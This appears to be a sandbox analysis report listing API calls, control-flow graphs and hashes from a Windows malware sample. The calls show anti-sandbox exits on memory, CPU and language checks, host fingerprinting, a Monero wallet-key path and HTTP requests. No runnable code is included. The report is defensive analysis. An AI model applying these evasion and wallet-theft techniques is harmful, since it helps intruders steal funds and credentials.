                    control_flow_graph 1301 3c17a0-3c17cd call 3caad0 StrCmpCA 1304 3c17cf-3c17d1 ExitProcess 1301->1304 1305 3c17d7-3c17f1 call 3caad0 1301->1305 1309 3c17f4-3c17f8 1305->1309 1310 3c17fe-3c1811 1309->1310 1311 3c19c2-3c19cd call 3ca800 1309->1311 1313 3c199e-3c19bd 1310->1313 1314 3c1817-3c181a 1310->1314 1313->1309 1316 3c185d-3c186e StrCmpCA 1314->1316 1317 3c187f-3c1890 StrCmpCA 1314->1317 1318 3c1835-3c1844 call 3ca820 1314->1318 1319 3c1970-3c1981 StrCmpCA 1314->1319 1320 3c18f1-3c1902 StrCmpCA 1314->1320 1321 3c1951-3c1962 StrCmpCA 1314->1321 1322 3c1932-3c1943 StrCmpCA 1314->1322 1323 3c1913-3c1924 StrCmpCA 1314->1323 1324 3c18ad-3c18be StrCmpCA 1314->1324 1325 3c18cf-3c18e0 StrCmpCA 1314->1325 1326 3c198f-3c1999 call 3ca820 1314->1326 1327 3c1849-3c1858 call 3ca820 1314->1327 1328 3c1821-3c1830 call 3ca820 1314->1328 1332 3c187a 1316->1332 1333 3c1870-3c1873 1316->1333 1334 3c189e-3c18a1 1317->1334 1335 3c1892-3c189c 1317->1335 1318->1313 1349 3c198d 1319->1349 1350 3c1983-3c1986 1319->1350 1340 3c190e 1320->1340 1341 3c1904-3c1907 1320->1341 1346 3c196e 1321->1346 1347 3c1964-3c1967 1321->1347 1344 3c194f 1322->1344 1345 3c1945-3c1948 1322->1345 1342 3c1926-3c1929 1323->1342 1343 3c1930 1323->1343 1336 3c18ca 1324->1336 1337 3c18c0-3c18c3 1324->1337 1338 3c18ec 1325->1338 1339 3c18e2-3c18e5 1325->1339 1326->1313 1327->1313 1328->1313 1332->1313 1333->1332 1354 3c18a8 1334->1354 1335->1354 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1343 1343->1313 1344->1313 1345->1344 1346->1313 1347->1346 1349->1313 1350->1349 1354->1313
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 003C17C5
                    • ExitProcess.KERNEL32 ref: 003C17D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: 859542ae4b37a4498cdd0c26b0d678d0134c26fbaab5878e04fc98d9a19e306c
                    • Instruction ID: 58d0ae697dbed3978425a86cb7c6203b096ac3f7622e08b3d5885e067d9ee72a
                    • Opcode Fuzzy Hash: 859542ae4b37a4498cdd0c26b0d678d0134c26fbaab5878e04fc98d9a19e306c
                    • Instruction Fuzzy Hash: 75516AB5A04209EBCB06DFA0D954FBE77BAAF45704F10804DE40AEB241D774ED45EBA2
                    Function 003C7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1356 3c7500-3c754a GetWindowsDirectoryA 1357 3c754c 1356->1357 1358 3c7553-3c75c7 GetVolumeInformationA call 3c8d00 * 3 1356->1358 1357->1358 1365 3c75d8-3c75df 1358->1365 1366 3c75fc-3c7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 3c75e1-3c75fa call 3c8d00 1365->1367 1369 3c7628-3c7658 wsprintfA call 3ca740 1366->1369 1370 3c7619-3c7626 call 3ca740 1366->1370 1367->1365 1377 3c767e-3c768e 1369->1377 1370->1377
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003C7542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003C757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C760A
                    • wsprintfA.USER32 ref: 003C7640
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\$=
                    • API String ID: 1544550907-3393898382
                    • Opcode ID: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                    • Instruction ID: 90ce733143e7006e1b3fa7292b20e2f947fd02ead15d49a79da4f873b68ce15c
                    • Opcode Fuzzy Hash: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                    • Instruction Fuzzy Hash: 634151B1D04258ABDB11DB94DC45FEEBBB8AB18704F10419DF509AB280D7786E44CFA6
                    Function 003C69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181730), ref: 003C98A1
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181508), ref: 003C98BA
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181748), ref: 003C98D2
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181760), ref: 003C98EA
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,011816D0), ref: 003C9903
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01188C70), ref: 003C991B
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01175430), ref: 003C9933
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,011755D0), ref: 003C994C
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181628), ref: 003C9964
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181658), ref: 003C997C
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181640), ref: 003C9995
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181520), ref: 003C99AD
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,011755F0), ref: 003C99C5
                      • Part of subcall function 003C9860: GetProcAddress.KERNEL32(76210000,01181550), ref: 003C99DE
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003B11D0: ExitProcess.KERNEL32 ref: 003B1211
                      • Part of subcall function 003B1160: GetSystemInfo.KERNEL32(?), ref: 003B116A
                      • Part of subcall function 003B1160: ExitProcess.KERNEL32 ref: 003B117E
                      • Part of subcall function 003B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                      • Part of subcall function 003B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
                      • Part of subcall function 003B1110: ExitProcess.KERNEL32 ref: 003B1143
                      • Part of subcall function 003B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                      • Part of subcall function 003B1220: __aulldiv.LIBCMT ref: 003B1258
                      • Part of subcall function 003B1220: __aulldiv.LIBCMT ref: 003B1266
                      • Part of subcall function 003B1220: ExitProcess.KERNEL32 ref: 003B1294
                      • Part of subcall function 003C6770: GetUserDefaultLangID.KERNEL32 ref: 003C6774
                      • Part of subcall function 003B1190: ExitProcess.KERNEL32 ref: 003B11C6
                      • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                      • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                      • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                      • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                      • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                      • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                    • Sleep.KERNEL32(00001770), ref: 003C6B04
                    • CloseHandle.KERNEL32(?,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                    • ExitProcess.KERNEL32 ref: 003C6B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                    • Instruction ID: c81cbdf78560937b4258deb426cd9d45c06c68473f8af1cf3d3a712f3ccdfe1f
                    • Opcode Fuzzy Hash: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                    • Instruction Fuzzy Hash: A131D4B1900608AADB06FBA0DC57FEE7778AB14344F50451CF602EA191EF746D05DBA6
                    Function 003B1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1436 3b1220-3b1247 call 3c89b0 GlobalMemoryStatusEx 1439 3b1249-3b1271 call 3cda00 * 2 1436->1439 1440 3b1273-3b127a 1436->1440 1441 3b1281-3b1285 1439->1441 1440->1441 1444 3b129a-3b129d 1441->1444 1445 3b1287 1441->1445 1447 3b1289-3b1290 1445->1447 1448 3b1292-3b1294 ExitProcess 1445->1448 1447->1444 1447->1448
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                    • __aulldiv.LIBCMT ref: 003B1258
                    • __aulldiv.LIBCMT ref: 003B1266
                    • ExitProcess.KERNEL32 ref: 003B1294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                    • Instruction ID: d0b3fe46223a359b6509849882fe235cf117ee26987b39c6fac7bdee404eef2d
                    • Opcode Fuzzy Hash: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                    • Instruction Fuzzy Hash: 05014BB0940308AAEB10EBE4DC49BAEBB78AB14705F608458F705FA280D7B46A458799
                    Function 003C6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1450 3c6af3 1451 3c6b0a 1450->1451 1453 3c6b0c-3c6b22 call 3c6920 call 3c5b10 CloseHandle ExitProcess 1451->1453 1454 3c6aba-3c6ad7 call 3caad0 OpenEventA 1451->1454 1459 3c6ad9-3c6af1 call 3caad0 CreateEventA 1454->1459 1460 3c6af5-3c6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                    • Sleep.KERNEL32(00001770), ref: 003C6B04
                    • CloseHandle.KERNEL32(?,00000000,?,01188AD0,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                    • ExitProcess.KERNEL32 ref: 003C6B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                    • Instruction ID: 483a6fe3f105f22673f84626d20af7d365911afde9ce3215cf9d07bec748271c
                    • Opcode Fuzzy Hash: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                    • Instruction Fuzzy Hash: E4F058B4A44209ABE702ABA1DC0BFBE7B78EB14741F10451CB507E91C1DBB46D44EBA7
                    Function 003B47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 5be5968e0eb2416499ce26f4c11a681f17cff91c34a83d80e1b4eeef3420953c
                    • Instruction ID: 429850d42fde1f4ed778b11b24e57a3615a122c9fc9c0332e6af3e9f623d8ba4
                    • Opcode Fuzzy Hash: 5be5968e0eb2416499ce26f4c11a681f17cff91c34a83d80e1b4eeef3420953c
                    • Instruction Fuzzy Hash: 6B2142B5D01209ABDF14DF55E845BEE7B75FB44314F108625F515AB2C0EB706A09CF81
                    Function 003C51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                      • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6303
                      • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                      • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B6385
                      • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                      • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                    • Instruction ID: 93db41ac6ad04fe5507e840c141d46c349189d214b7cabe1be401aafb0440ce5
                    • Opcode Fuzzy Hash: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                    • Instruction Fuzzy Hash: E311F570900608ABCB16FBA0D952FED7778AF50304F804558E90A8E592EF34AF06DB92
                    Function 003C78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                    • Instruction ID: 4b893b6936f5d5cc32ab2607236d1af9427bd30add2feca547593f0e9763e9da
                    • Opcode Fuzzy Hash: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                    • Instruction Fuzzy Hash: 7B0162B1904204EFC710DF98DD45FAABBB8F704B61F10421AF945E3680C37459048BA2
                    Function 003B1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
